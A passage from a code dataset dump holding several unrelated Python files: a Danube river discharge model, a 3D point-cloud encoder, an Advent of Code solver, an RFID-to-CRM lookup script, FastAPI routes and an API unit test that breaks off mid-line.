+ value\n return ds\n\ndef select_riverpoints(glofas):\n return (glofas['dis'] > 5)\n\ndef get_mask_of_basin(da, kw_basins='Danube'):\n \"\"\"\n Parameters:\n -----------\n da : xr.DataArray\n contains the coordinates\n kw_basins : str\n identifier of the basin in the basins dataset\n \"\"\"\n def transform_from_latlon(lat, lon):\n lat = np.asarray(lat)\n lon = np.asarray(lon)\n trans = Affine.translation(lon[0], lat[0])\n scale = Affine.scale(lon[1] - lon[0], lat[1] - lat[0])\n return trans * scale\n\n def rasterize(shapes, coords, fill=np.nan, **kwargs):\n \"\"\"Rasterize a list of (geometry, fill_value) tuples onto the given\n xray coordinates. This only works for 1d latitude and longitude\n arrays.\n \"\"\"\n transform = transform_from_latlon(coords['latitude'], coords['longitude'])\n out_shape = (len(coords['latitude']), len(coords['longitude']))\n raster = features.rasterize(shapes, out_shape=out_shape,\n fill=fill, transform=transform,\n dtype=float, **kwargs)\n return xr.DataArray(raster, coords=coords, dims=('latitude', 'longitude'))\n \n # this shapefile is from natural earth data\n # http://www.naturalearthdata.com/downloads/10m-cultural-vectors/10m-admin-1-states-provinces/\n shp2 = '/raid/home/srvx7/lehre/users/a1303583/ipython/ml_flood/data/drainage_basins/Major_Basins_of_the_World.shp'\n basins = geopandas.read_file(shp2)\n# print(basins)\n single_basin = basins.query(\"NAME == '\"+kw_basins+\"'\").reset_index(drop=True)\n# print(single_basin)\n shapes = [(shape, n) for n, shape in enumerate(single_basin.geometry)]\n\n da['basins'] = rasterize(shapes, da.coords)\n da = da.basins == 0\n return da.drop('basins')\n \ndef select_upstream(glofas, lat, lon, basin='Danube'):\n dis_box_mean = glofas['dis'].mean('time')\n da = dis_box_mean\n \n # longitude condition\n is_west = (~np.isnan(dis_box_mean.where(dis_box_mean.longitude <= lon))).astype(bool)\n\n river_min_discharge = 20\n # mask_box_mean_greater = dis_box_mean > river_min_discharge\n mask_box_mean_greater = (~np.isnan(dis_box_mean.where(dis_box_mean > river_min_discharge))).astype(bool)\n \n mask_basin = get_mask_of_basin(dis_box_mean, kw_basins=basin)\n #mask_basin = ~np.isnan(tmp).astype(bool)\n \n #dlat = dis_box_mean.latitude[1]-dis_box_mean.latitude[0]\n #dlon = dis_box_mean.longitude[1]-dis_box_mean.longitude[0]\n nearby_mask = dis_box_mean*0.\n nearby_mask.loc[dict(latitude=slice(lat+1.5, lat-1.5), \n longitude=slice(lon-1.5, lon+1.5))] = 1.\n nearby_mask = nearby_mask.astype(bool)\n #plt.imshow(nearby_mask.astype(int))\n #plt.show()\n \n mask = mask_box_mean_greater & mask_basin & nearby_mask & is_west\n if 'basins' in mask.coords:\n mask = mask.drop('basins')\n if 'time' in mask.coords:\n mask = mask.drop('time') # time and basins dimension make no sense here\n return mask\n\ndef train(pipe, X_train, y_train, X_valid, y_valid):\n history = pipe.fit(X_train.values, y_train.values,\n model__validation_data=(X_valid.values, #.values, \n y_valid.values)) #.values.reshape(-1,1)))\n\n h = history.named_steps['model'].model.history\n\n # Plot training & validation loss value\n plt.figure()\n plt.plot(h.history['loss'], label='loss')\n plt.plot(h.history['val_loss'], label='val_loss')\n plt.title('Model loss')\n plt.ylabel('Loss')\n plt.xlabel('Epoch')\n plt.legend() #['Train', 'Test'], loc='upper left')\n plt.gca().set_yscale('log')\n plt.show()\n\ndef add_shifted_predictors(ds, shifts, variables='all'):\n \"\"\"Adds additional variables to an array which are shifted in time.\n \n Parameters\n ----------\n ds : 
xr.Dataset\n shifts : list of integers\n variables : str or list\n \"\"\"\n if variables == 'all': \n variables = ds.data_vars\n \n for var in variables:\n for i in shifts:\n if i == 0: continue # makes no sense to shift by zero\n newvar = var+'-'+str(i)\n ds[newvar] = ds[var].shift(time=i)\n return ds\n\ndef preprocess_reshape_flowmodel(X_dis, y_dis):\n \"\"\"Reshape, merge predictor/predictand in time, drop nans.\"\"\"\n X_dis = X_dis.to_array(dim='time_feature') \n #print('X before feature-stacking', X_dis)\n X_dis = X_dis.stack(features=['latitude', 'longitude', 'time_feature'])\n #print('X before featuredrop', X_dis)\n Xar = X_dis.dropna('features', how='all')\n \n yar = y_dis\n yar = yar.drop(['latitude', 'longitude'])\n yar.coords['features'] = 'dis'\n \n #print('X, y before concat for time nan dropping', Xar, yar)\n Xy = xr.concat([Xar, yar], dim='features')\n Xyt = Xy.dropna('time', how='any') # drop them as we cannot train on nan values\n time = Xyt.time\n \n Xda = Xyt[:,:-1]\n yda = Xyt[:,-1]\n return Xda, yda, time\n\ndef add_time(vector, time, name=None):\n \"\"\"Converts arrays to xarrays with a time coordinate.\"\"\"\n return xr.DataArray(vector, dims=('time'), coords={'time': time}, name=name)\n\nclass FlowModel(object):\n def __init__(self, **kwargs):\n model = keras.models.Sequential()\n self.cfg = kwargs\n \n model.add(keras.layers.BatchNormalization())\n \n model.add(keras.layers.Dense(8,\n kernel_initializer=keras.initializers.Zeros(), \n #bias_initializer=keras.initializers.Constant(value=self.cfg.get('initialbias')),\n activation='relu')) #('sigmoid'))\n #model.add(Dropout(self.cfg.get('dropout')))\n #model.add(keras.layers.Dense(32))\n #model.add(keras.layers.Activation('sigmoid'))\n #model.add(Dropout(self.cfg.get('dropout')))\n #model.add(keras.layers.Dense(16))\n #model.add(keras.layers.Activation('sigmoid'))\n #model.add(Dropout(self.cfg.get('dropout')))\n #model.add(keras.layers.Dense(8))\n #model.add(keras.layers.Activation('sigmoid'))\n #model.add(Dropout(self.cfg.get('dropout')))\n model.add(keras.layers.Dense(1, activation='linear'))\n # bias_initializer=keras.initializers.Constant(value=9000)))\n \n #ha = self.cfg.get('hidden_activation')\n\n #for N_nodes in self.cfg.get('N_hidden_nodes'):\n # \n # model.add(hidden)\n # model.add(ha.copy())\n # \n # if self.cfg.get('dropout'):\n # model.add(Dropout(self.cfg.get('dropout')))#\n\n #outputlayer = keras.layers.Dense(1, activation='linear')\n\n #optimizer_name, options_dict = self.cfg.get('optimizer')\n #optimizer = getattr(keras.optimizers, optimizer_name)(**options_dict)\n #optimizer = keras.optimizers.SGD(lr=0.01)\n rmsprop = keras.optimizers.RMSprop(lr=.05)\n sgd = keras.optimizers.SGD(lr=0.05, decay=1e-6, momentum=0.8, nesterov=True)\n\n model.compile(loss=self.cfg.get('loss'), \n optimizer=rmsprop)\n self.model = model\n\n self.callbacks = [keras.callbacks.EarlyStopping(monitor='val_loss',\n min_delta=1, patience=10, verbose=0, mode='auto',\n baseline=None, restore_best_weights=True),\n keras.callbacks.ModelCheckpoint(self.cfg.get('filepath'), \n monitor='val_loss', verbose=0, save_best_only=True, \n save_weights_only=False, mode='auto', period=1),]\n\n def predict(self, Xda, name=None):\n a = self.model.predict(Xda.values).squeeze()\n return add_time(a, Xda.time, name=name)\n\n def fit(self, Xda, yda, **kwargs):\n return self.model.fit(Xda, yda.reshape(-1,1),\n epochs=self.cfg.get('epochs', None),\n batch_size=self.cfg.get('batch_size', None),\n callbacks=self.callbacks,\n verbose=0,\n **kwargs)\n\ndef 
create_FlowModel(filepath, initialdischarge):\n mlp_kws = dict(optimizer=('sgd', dict(lr=.05)),\n loss='mean_squared_error',\n #N_hidden_nodes=(4,4),\n #hidden_activation=keras.layers.Activation('sigmoid'), #keras.layers.ReLU(), #-LeakyReLU(alpha=0.3), #'relu',\n #output_activation='linear',\n #bias_initializer='random_uniform',\n batch_size=128,\n dropout=0.25,\n epochs=1000,\n filepath = filepath,\n initialbias = initialdischarge,\n )\n \n return Pipeline([#('scaler', StandardScaler()),\n #('pca', PCA(n_components=2)),\n ('model', FlowModel(**mlp_kws)),],\n verbose=False)\n\nstatic = xr.open_dataset('../data/danube/era5_slt_z_slor_lsm_stationary_field.nc')\n\n#era5 = xr.open_dataset('../data/usa/era5_lsp_cp_1981-2017_daysum.nc')\n#era5 = shift_time(era5, -dt.timedelta(hours=23))\n\nera5 = xr.open_dataset('../data/danube/era5_danube_pressure_and_single_levels.nc')\n\nglofas = read_glofas_danube()\n\nglofas = glofas.isel(time=slice(0, 365*10)) # just to reduce the amount of data\n\nif 'tp' in era5:\n tp = era5['tp']\nelse:\n tp = (era5['cp']+era5['lsp'])*1000\n tp.name = 'total precip [mm]'\ntp = tp.interp(latitude=glofas.latitude,\n longitude=glofas.longitude)\n\nshifts = range(1,4)\nX = add_shifted_predictors(glofas, shifts, variables='all')\nX = X.drop('dis') # current dis is to be predicted, is not a feature\n\ny = glofas['dis'] # just this variable as dataarray\n\nN_train = 365*5\nN_valid = 365*1\n\nfm_path = '../models/flowmodel/danube/flowmodel_lat_lon.h5'\n\n#riverpoints = select_riverpoints(glofas)\ndanube_gridpoints = get_mask_of_basin(glofas['dis'].isel(time=0), 'Danube')\n\nplt.imshow(danube_gridpoints.astype(int))\nplt.show()\n\nmask_springs = glofas['dis'].isel(time=0)\nmask_springs.values[:] = 0.\n\n\nfor lon in danube_gridpoints.longitude:\n for lat in danube_gridpoints.latitude:\n #print(danube_gridpoints.sel(latitude=lat, longitude=lon))\n if danube_gridpoints.sel(latitude=lat, longitude=lon) == 1:\n \n lats, lons = sfloat(lat), sfloat(lon)\n modpath = fm_path.replace('lat', lats).replace('lon', lons)\n\n upstream = select_upstream(glofas, lat, lon, basin='Danube')\n\n N_upstream = int(upstream.sum())\n if N_upstream < 3:\n print(lats, lons, 'is spring.')\n mask_springs.loc[dict(latitude=lat, longitude=lon)] = 1.\n\n #plt.imshow(mask_springs.astype(int))\n #plt.title('springs')\n #plt.show()\n else:\n if not os.path.isfile(modpath):\n print(lats, lons, 'is danube river -> train flowmodel')\n plt.imshow(upstream.astype(int))\n plt.title(str(N_upstream)+' upstream points for '+lats+' '+lons)\n plt.show()\n \n plt.imshow(mask_springs.astype(int))\n plt.title('springs')\n plt.show()\n \n \n tp_box = tp.loc[dict(latitude=slice(lat+1.5, lat-1.5), \n longitude=slice(lon-1.5, lon+1.5))] \n noprecip = tp_box.mean(['longitude', 'latitude']) < 0.1\n\n Xt = X.where(noprecip, drop=True)\n Xt = Xt.where(upstream, drop=True)\n yt = y.sel(latitude=float(lat), longitude=float(lon))\n\n #print(Xt, upstream)\n Xda, yda, time = preprocess_reshape_flowmodel(Xt, yt)\n print(Xda.shape, yda.shape)\n \n X_train = Xda[:N_train,:] \n y_train = yda[:N_train] \n X_valid = Xda[N_train:N_train+N_valid,:] \n y_valid = yda[N_train:N_train+N_valid] \n\n print(X_train.shape, y_train.shape)\n print(X_valid.shape, y_valid.shape)\n initialdischarge = np.mean(y_train)\n pipe = create_FlowModel(modpath, initialdischarge)\n\n train(pipe, X_train, y_train, X_valid, 
y_valid)\n","repo_name":"AdrianAlpizar/PluMA-Jupyter","sub_path":"mlcombimodel1loop.py","file_name":"mlcombimodel1loop.py","file_ext":"py","file_size_in_byte":13865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8169819779","text":"#### 3D Vision reimplementation\n## Dusan, Daniil, Stefan\nimport torch\nimport torch.nn as nn\nfrom im2mesh.layers import ResnetBlockFC, Unet, FCPlanenet\nimport numpy as np\nfrom numpy import linalg as LA\nfrom torch_scatter import scatter_mean, scatter_max\nimport os\nimport re\n\ndef maxpool(x, dim=-1, keepdim=False):\n out, _ = x.max(dim=dim, keepdim=keepdim)\n return out\n \ndef ChangeBasis(plane_parameters, device = 'cuda'):\n # Input: Plane parameters (batch_size x L x 3) - torch.tensor dtype = torch.float32\n # Output: C_mat (batch_size x L x 4 x 3)\n # C_mat is stacked matrices of:\n # 1. Change of basis matrices (batch_size x L x 3 x 3)\n # 2. Normalizing constants (batch_size x L x 1 x 3)\n device = device\n\n batch_size, L, _ = plane_parameters.size()\n normal = plane_parameters.reshape([batch_size * L, 3]).float()\n normal = normal / torch.norm(normal, p=2, dim=1).view(batch_size * L, 1) #normalize\n normal = normal + 0.0001 # Avoid non-invertible matrix down the road\n\n basis_x = torch.tensor([1, 0, 0], dtype=torch.float32).repeat(batch_size*L,1).to(device)\n basis_y = torch.tensor([0, 1, 0], dtype=torch.float32).repeat(batch_size*L,1).to(device)\n basis_z = torch.tensor([0, 0, 1], dtype=torch.float32).repeat(batch_size*L,1).to(device)\n\n v = torch.cross(basis_z.to(device), normal)\n zero = torch.zeros([batch_size*L], dtype=torch.float32).to(device)\n skew = torch.zeros([batch_size*L, 3, 3], dtype=torch.float32).to(device)\n skew[range(batch_size*L), 0] = torch.stack([zero, -v[:,2], v[:,1]]).t()\n skew[range(batch_size * L), 1] = torch.stack([v[:,2], zero, -v[:,0]]).t()\n skew[range(batch_size * L), 2] = torch.stack([-v[:,1], v[:,0], zero]).t()\n\n idty = torch.eye(3).to(device)\n idty = idty.reshape((1, 3, 3))\n idty = idty.repeat(batch_size*L, 1, 1)\n dot = (1-torch.sum(normal*basis_z,dim=1)).unsqueeze(1).unsqueeze(2)\n div = torch.norm(v, p=2, dim=1)**2\n div = div.unsqueeze(1).unsqueeze(2)\n\n R = (idty + skew + torch.matmul(skew, skew) * dot / div)\n\n new_basis_x = torch.bmm(R, basis_x.unsqueeze(2))\n new_basis_y = torch.bmm(R, basis_y.unsqueeze(2))\n new_basis_z = torch.bmm(R, basis_z.unsqueeze(2))\n\n new_basis_matrix = torch.cat([new_basis_x, new_basis_y, new_basis_z], dim=2)\n\n C_inv = torch.inverse(new_basis_matrix)\n\n # Define normalization constant\n b_x = torch.abs(new_basis_x).squeeze(2)\n b_y = torch.abs(new_basis_y).squeeze(2)\n p_dummy = torch.tensor([1, 1, 1], dtype=torch.float32).repeat(batch_size*L,1).to(device)\n p_x = torch.sum(b_x*p_dummy,dim=1).unsqueeze(1) / torch.sum(b_x*b_x,dim=1).unsqueeze(1) * b_x\n p_y = torch.sum(b_y*p_dummy,dim=1).unsqueeze(1) / torch.sum(b_y*b_y,dim=1).unsqueeze(1)* b_y\n\n c_x = torch.norm(p_x, p=2, dim=1)\n c_y = torch.norm(p_y, p=2, dim=1)\n\n normalizer = torch.max(c_x, c_y).unsqueeze(1).unsqueeze(2).repeat(1,1,3)\n\n C_mat = torch.cat([C_inv, normalizer], dim=1)\n\n C_mat = C_mat.view(batch_size,L,4,3)\n\n return C_mat\n\n\nclass SimplePointnet(nn.Module):\n ''' PointNet-based encoder network. 
With plane training\n\n Args:\n c_dim (int): dimension of latent code c\n dim (int): input points dimension\n hidden_dim (int): hidden dimension of the network\n '''\n\n def __init__(self, c_dim=128, dim=3, hidden_dim=128, n_channels = 3):\n super().__init__()\n self.c_dim = c_dim\n\n self.fc_pos = nn.Linear(dim, 2*hidden_dim)\n self.fc_0 = nn.Linear(2*hidden_dim, hidden_dim)\n self.fc_1 = nn.Linear(2*hidden_dim, hidden_dim)\n self.fc_2 = nn.Linear(2*hidden_dim, hidden_dim)\n self.fc_3 = nn.Linear(2*hidden_dim, hidden_dim)\n self.fc_c = nn.Linear(hidden_dim, c_dim)\n\n self.actvn = nn.ReLU()\n self.pool = maxpool\n\n def forward(self, p):\n batch_size, T, D = p.size()\n\n\n # output size: B x T X F\n net = self.fc_pos(p)\n net = self.fc_0(self.actvn(net))\n pooled = self.pool(net, dim=1, keepdim=True).expand(net.size())\n net = torch.cat([net, pooled], dim=2)\n\n net = self.fc_1(self.actvn(net))\n pooled = self.pool(net, dim=1, keepdim=True).expand(net.size())\n net = torch.cat([net, pooled], dim=2)\n\n net = self.fc_2(self.actvn(net))\n pooled = self.pool(net, dim=1, keepdim=True).expand(net.size())\n net = torch.cat([net, pooled], dim=2)\n\n net = self.fc_3(self.actvn(net))\n\n # Reducee to B x F\n net = self.pool(net, dim=1)\n\n c = self.fc_c(self.actvn(net))\n\n return c\n\n\nclass ResnetPointnet(nn.Module):\n # PointNet-based encoder network with ResNet blocks.\n\n # Args:\n # c_dim (int): dimension of latent code c\n # dim (int): input points dimension\n # hidden_dim (int): hidden dimension of the network\n # n_channels (int): number of planes for projection\n \n\n def __init__(self, c_dim=128, dim=3, hidden_dim=128, n_channels = 4, plane_param_file=\"normals.csv\", object=\"null\"):\n super().__init__()\n self.c_dim = c_dim\n self.hidden_dim = hidden_dim \n self.n_channels = n_channels\n\n self.file_name = str(plane_param_file)\n self.object = str(object)\n \n # For grid features\n self.fc_pos = nn.Linear(dim, 2*hidden_dim)\n self.block_0 = ResnetBlockFC(2*hidden_dim, hidden_dim)\n self.block_1 = ResnetBlockFC(2*hidden_dim, hidden_dim)\n self.block_2 = ResnetBlockFC(2*hidden_dim, hidden_dim)\n self.block_3 = ResnetBlockFC(2*hidden_dim, hidden_dim)\n self.block_4 = ResnetBlockFC(2*hidden_dim, hidden_dim)\n self.fc_c = nn.Linear(hidden_dim, c_dim)\n self.unet = Unet(hidden_dim)\n\n # For plane prediction\n self.fc_plane_net = FCPlanenet(n_dim=dim, n_channels=n_channels, hidden_dim=hidden_dim)\n self.fc_plane_hdim = nn.Linear(n_channels*3, hidden_dim)\n\n # Activation & pooling\n self.actvn = nn.ReLU()\n self.pool = maxpool\n \n is_cuda = torch.cuda.is_available()\n self.device = torch.device(\"cuda\" if is_cuda else \"cpu\")\n\n def forward(self, p):\n batch_size, T, D = p.size()\n \n\n # Grid features\n net = self.fc_pos(p)\n net = self.block_0(net)\n pooled = self.pool(net, dim=1, keepdim=True).expand(net.size())\n net = torch.cat([net, pooled], dim=2)\n net = self.block_1(net)\n pooled = self.pool(net, dim=1, keepdim=True).expand(net.size())\n net = torch.cat([net, pooled], dim=2)\n net = self.block_2(net)\n pooled = self.pool(net, dim=1, keepdim=True).expand(net.size())\n net = torch.cat([net, pooled], dim=2)\n net = self.block_3(net)\n pooled = self.pool(net, dim=1, keepdim=True).expand(net.size())\n net = torch.cat([net, pooled], dim=2)\n net = self.block_4(net) # batch_size x T x hidden_dim (T: number of sampled input points)\n\n net_pl = self.fc_plane_net(p)\n plane_parameters = net_pl.view(batch_size,-1,3) # batch_size x L x 3\n\n flatten_tensor = 
torch.flatten(plane_parameters)\n string = str(flatten_tensor)\n string = string.replace('\\n', ' ').replace(' ', '')\n sliced_string = re.findall(r'\\[(.*?)\\]', string)[0]\n st = self.object + \",\" + sliced_string + \"\\n\"\n\n if os.path.isfile(self.file_name) == False:\n log = open(self.file_name, \"w+\")\n log.write(st)\n print(\"{} normals appended to {}\".format(self.object, self.file_name))\n log.close()\n else:\n log = open(self.file_name, \"a\")\n log.write(st)\n print(\"{} normals appended to {}\".format(self.object, self.file_name))\n log.close()\n\n raise ValueError('Intentionally stop program here. No need to run full generation.')\n\n\n #eye_basis = torch.tensor([[1, 0, 0], [0, 1, 0], [0, 0, 1]]).to(self.device)\n #canonical_planes = torch.cat(batch_size*[eye_basis]).view(batch_size, 3, 3)\n #plane_parameters = canonical_planes\n\n C_mat = ChangeBasis(plane_parameters, device = self.device) # batch_size x L x 4 x 3\n net_pl = self.fc_plane_hdim(self.actvn(net_pl))\n net_pl = net_pl.unsqueeze(1) # batch_size x 1 x hidden_dim\n\n # Combine net and net_pl\n net = net + net_pl # to allow backpropagation to net_pl \n\n # Create grid feature\n grid_res = 64\n max_dim = 0.55\n H = grid_res\n W = grid_res\n interval = float(2 / (grid_res-1))\n\n c = torch.zeros([batch_size, self.n_channels, W, H, self.hidden_dim], device=self.device)\n\n for l in range(C_mat.size()[1]):\n p_project = torch.div(p, max_dim)\n p_project = torch.transpose(p_project, 2,1)\n p_project = torch.bmm(C_mat[:,l,:3], p_project)\n p_project = torch.transpose(p_project, 2,1)\n\n p_project = p_project / (C_mat[:,l,3,0]+0.05).unsqueeze(1).unsqueeze(2) # divide by normalizer so that range is [-1,1]\n p_project = p_project[:,:,:2]\n xy_index = (p_project + 1) / interval\n xy_index[xy_index>=(grid_res-1)] = grid_res-1-0.1\n xy_index[xy_index<0] = 0\n xy_index = torch.round(xy_index).int()\n cell_index = xy_index[:,:,0] + H * xy_index[:,:,1]\n cell_index = cell_index.unsqueeze(2).long()\n out = net.new_zeros((batch_size, W*H, self.hidden_dim)).to(self.device)\n out, _ = scatter_max(net, cell_index, dim=1, out=out)\n c[:,l,] = out.view(batch_size, H, W, self.hidden_dim)\n\n\n # Reshape for U-Net\n _, L, H, W, d_dim = c.size()\n c = c.view([batch_size * L, H, W, d_dim])\n c = c.permute(0, 3, 1, 2)\n\n # U-Net\n c = self.unet(c)\n c = c.permute(0, 2, 3, 1)\n c = c.view(batch_size, L, H, W, self.c_dim)\n\n return c, C_mat\n","repo_name":"daniil-777/dynamic_geo_convolutional_onet","sub_path":"src/visualisation_planes/im2mesh/encoder/fc_point_net.py","file_name":"fc_point_net.py","file_ext":"py","file_size_in_byte":9907,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"41110586075","text":"#!/usr/bin/env python3\n\nfrom os.path import dirname, realpath\ndir_path = dirname(realpath(__file__))\n\nwith open(f'{dir_path}/input') as f:\n puzzle_input = f.read().split()\n\ndef parse_input():\n return [[puzzle_input[i], int(puzzle_input[i+1])] for i in range(0, len(puzzle_input), 2)]\n\nclass VM:\n def __init__(self, insts=[]):\n self.insts = insts\n\n def run(self):\n acc = 0\n header = 0\n l = len(self.insts)\n\n seen = set()\n\n while header != l:\n inst = self.insts[header]\n\n if header in seen:\n return False, acc\n\n seen.add(header)\n\n if inst[0] == 'acc':\n acc += inst[1]\n elif inst[0] == 'jmp':\n header += inst[1] - 1\n\n header += 1\n\n return True, acc\n\ndef part1():\n pi = parse_input()\n\n return VM(pi).run()[1]\n\ndef part2():\n pi = parse_input()\n\n 
replace = {'nop': 'jmp', 'jmp': 'nop'}\n\n vm = VM(pi)\n\n for i in range(len(pi)):\n inst = pi[i]\n\n if inst[0] in replace:\n vm.insts[i][0] = replace[inst[0]]\n\n status, res = vm.run()\n\n if(status):\n return res\n\n vm.insts[i][0] = replace[inst[0]]\n\n\ndef main():\n part1_res = part1()\n print(f'Part 1: {part1_res}')\n\n part2_res = part2()\n print(f'Part 2: {part2_res}')\n\nif __name__ == '__main__':\n main()\n","repo_name":"tannerstephens/advent-of-code","sub_path":"2020/day8/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"583820636","text":"\nimport requests\nimport config\nimport unidecode\n\n\n\n\ndef git_version ():\n # https://api.github.com/repos/{owner}/{repo}/releases/latest\n response = requests.get(\"https://api.github.com/repos/TomasSpusta/pipi_reader/releases/latest\")\n config.git_release = response.json()[\"name\"]\n print (config.git_release)\n \ndef crm_request_rfid ():\n #scanned_rfid = str (scanned_rfid)\n payload = {\"rfid\":config.card_id}\n \n try:\n crm_response = requests.post (\"https://crm.api.ceitec.cz/get-contact-by-rfid\", json = payload)\n crm_data = crm_response.json()\n #print (crm_data)\n \n if len (crm_data) == 0:\n config.in_database = False\n print (\"User is not in database\") # User is not in CRM database so we can continue with the process\n \n else: \n config.in_database = True\n user_name = crm_data[0][\"firstname\"]\n config.user_full_name = crm_data[0][\"full_name\"]\n config.user_name = unidecode.unidecode (user_name)\n config.user_id = crm_data[0][\"contactid\"]\n #print (config.user_name)\n #print (\"User ID is {} and User's first name is {}\" .format(config.user_id, config.user_name))\n \n except Exception as e:\n print(\"Error in crm_request_rfid:\")\n print (e)\n \ndef crm_send_dataset ():\n payload = {\"vutid\":config.vut_id, \"rfid\":config.card_id}\n\n try:\n crm_response = requests.patch (\"https://crm.api.ceitec.cz/save-rfid-by-vutid\", json = payload)\n crm_data = crm_response.json()\n \n print (crm_data)\n print (crm_response.status_code)\n \n if crm_response.status_code == 200:\n print (\"Writing to database successful\")\n else:\n print (\"Writing to database failed.\")\n return crm_response.status_code\n \n except Exception as e:\n print(\"Error in crm_request_rfid:\")\n print (e)\n ","repo_name":"TomasSpusta/pipi_scan","sub_path":"web_requests.py","file_name":"web_requests.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70049166642","text":"def solution(answer_sheet, sheets):\n length = len(answer_sheet)\n dic = {}\n for i in range(length):\n print(answer_sheet[i])\n bucket = []\n for j in range(len(sheets)):\n print(sheets[j][i])\n if answer_sheet[i] != sheets[j][i]:\n bucket.append((j, i))\n\n print(bucket)\n for k in range(len(bucket) - 1):\n for kk in range(k + 1, len(bucket)):\n\n if sheets[bucket[k][0]][bucket[k][1]] == sheets[bucket[kk][0]][bucket[kk][1]]:\n if dic.get((bucket[k][0], bucket[kk][0])) is None:\n dic[(bucket[k][0], bucket[kk][0])] = 1\n else:\n dic[(bucket[k][0], bucket[kk][0])] += 1\n print()\n print(dic)\n answer = -1\n return answer\n\n\nsolution(\"4132315142\", [\"3241523133\", \"4121314445\", \"3243523133\", \"4433325251\", 
\"2412313253\"])","repo_name":"SINHOLEE/Algorithm","sub_path":"python/프로그래머스/라인2.py","file_name":"라인2.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"44448523604","text":"class Animal:\n att_mod = 4\n def __init__(self, legs, flies):\n self.leg = legs\n self.flies = flies\n self.has_fur = True\n\n def had_birthday(self):\n print(self.att_mod)\n\nclass Insect(Animal):\n att_mod = 6 # Insect.att_mod\n def __init__(self, l, bool):\n super().__init__(l, bool)\n self.leg = l * 2\n self.flies = bool\n\n\na = Animal(4, True)\ni = Insect(6, False)\na.had_birthday() # Animal.had_birthday(a)\ni.had_birthday() # Animal.had_birthday(i)","repo_name":"LhallLhall/EverCraft","sub_path":"src/shtuff.py","file_name":"shtuff.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20983626631","text":"from fastapi import UploadFile,File,Depends\nfrom starlette.requests import Request\nfrom src.interfaces import FasAPIAdapter\nfrom .salesman import salesman,adapter,oauth2_token,salesman_token\n\n\n# route http://127.0.0.1:8000/api/v1/salesman/acount/add-marker-position\n@salesman.post(\"/acount/add-marker-position\",tags=['salesman'])\nasync def post_position(form_data:Request,token:str=Depends(oauth2_token)):\n id_salesman=await salesman_token.get_current_user(token)\n data=await form_data.form()\n return await adapter.post_position(id_salesman,data)\n \n#route http://127.0.0.1:8000/api/v1/salesman/acount/get-marker-position\n@salesman.get(\"acount/get-marker-position\",tags=['salesman'])\nasync def get_marker_position(token:str=Depends(oauth2_token)):\n id_salesman=await salesman_token.get_current_user(token)\n return await adapter.get_markers(id_salesman)\n\n#route http://127.0.0.1:8000/api/v1/salesman/acount/update-marker-position\n@salesman.put(\"/acount/update-marker-position\",tags=['salesman'])\nasync def update_marker_position(form_data:Request,token:str=Depends(oauth2_token)):\n id_salesman=await salesman_token.get_current_user(token)\n data=await form_data.form()\n return await adapter.update_marker_position(id_salesman,data)\n","repo_name":"fredhmacau/Yolisa-Project","sub_path":"YOLISA/backend/app/src/infra/http/routes/salesman/salesman_in_map.py","file_name":"salesman_in_map.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10466547085","text":"\"\"\"\n审核接口:管理员去审核\n\n审核的前置条件:\n 1、管理员登录(类级别的前置)\n 2、普通用户的角色添加项目\n 1)、普通用户登录(类级别的前置)\n 2)、创建一个项目(用例级别的前置)\n\"\"\"\nimport os\nimport unittest\nimport requests\nfrom jsonpath import jsonpath\nfrom unittestreport import ddt, list_data\nfrom common.handle_excel import HandleExcel\nfrom common.handle_path import DATA_DIR\nfrom common.handle_conf import conf\nfrom common.handle_log import stt_log\nfrom common.handle_mysql import HandleDB\nfrom common.handle_sign import HandleSign\nfrom common.tools import replace_data\nfrom testcases.fixture import BaseTest\n\n@ddt\nclass TestAudit(unittest.TestCase,BaseTest):\n excel = HandleExcel(os.path.join(DATA_DIR, 'jiekou.xlsx'), 'audit')\n cases = excel.read_data()\n db = HandleDB()\n\n @classmethod\n def setUpClass(cls) -> None:\n cls.admin_login()\n cls.user_login()\n # url = conf.get('env', 'base_url') + '/member/login'\n # # -------------管理员登陆----------------------------\n # \"\"\"用例类的前置方法:登录提取token\"\"\"\n # # 
1、请求登录接口,进行登录\n #\n # params = {\n # \"mobile_phone\": conf.get('test_data', 'admin_mobile'),\n # \"pwd\": conf.get('test_data', 'admin_pwd')\n # }\n # headers = eval(conf.get('env', 'headers'))\n # responce = requests.post(url=url, headers=headers, json=params)\n # res = responce.json()\n # # 2、登录成功之后再去提取token\n # token = jsonpath(res, '$..token')[0]\n # # 将token添加到请求头中\n # headers['Authorization'] = 'Bearer ' + token\n # # 保存含有token的请求头为类属性\n # cls.admin_headers = headers\n # # setattr(TestRecharge,'headers',headers)\n # # 3、提取用户的id给充值接口使用\n # cls.admin_member_id = jsonpath(res, '$..id')[0]\n # # -------------普通用户登陆----------------------------\n # # 1、请求登录接口,进行登录\n # params = {\n # \"mobile_phone\": conf.get('test_data', 'mobile'),\n # \"pwd\": conf.get('test_data', 'pwd')\n # }\n # headers = eval(conf.get('env', 'headers'))\n # responce = requests.post(url=url, headers=headers, json=params)\n # res = responce.json()\n # # 2、登录成功之后再去提取token\n # token = jsonpath(res, '$..token')[0]\n # # 将token添加到请求头中\n # headers['Authorization'] = 'Bearer ' + token\n # # 保存含有token的请求头为类属性\n # cls.headers = headers\n # # setattr(TestRecharge,'headers',headers)\n # # 3、提取用户的id给充值接口使用\n # cls.member_id = jsonpath(res, '$..id')[0]\n\n def setUp(self) -> None:\n self.add_project()\n\n @list_data(cases)\n def test_audit(self, item):\n # 第一步:准备数据\n url = conf.get('env', 'base_url') + item['url']\n # ========================动态替换参数=========================\n # 动态处理需要进行替换的参数\n # item['data']=item['data'].replace('#member_id#',str(self.member_id))\n item['data'] = replace_data(item['data'], 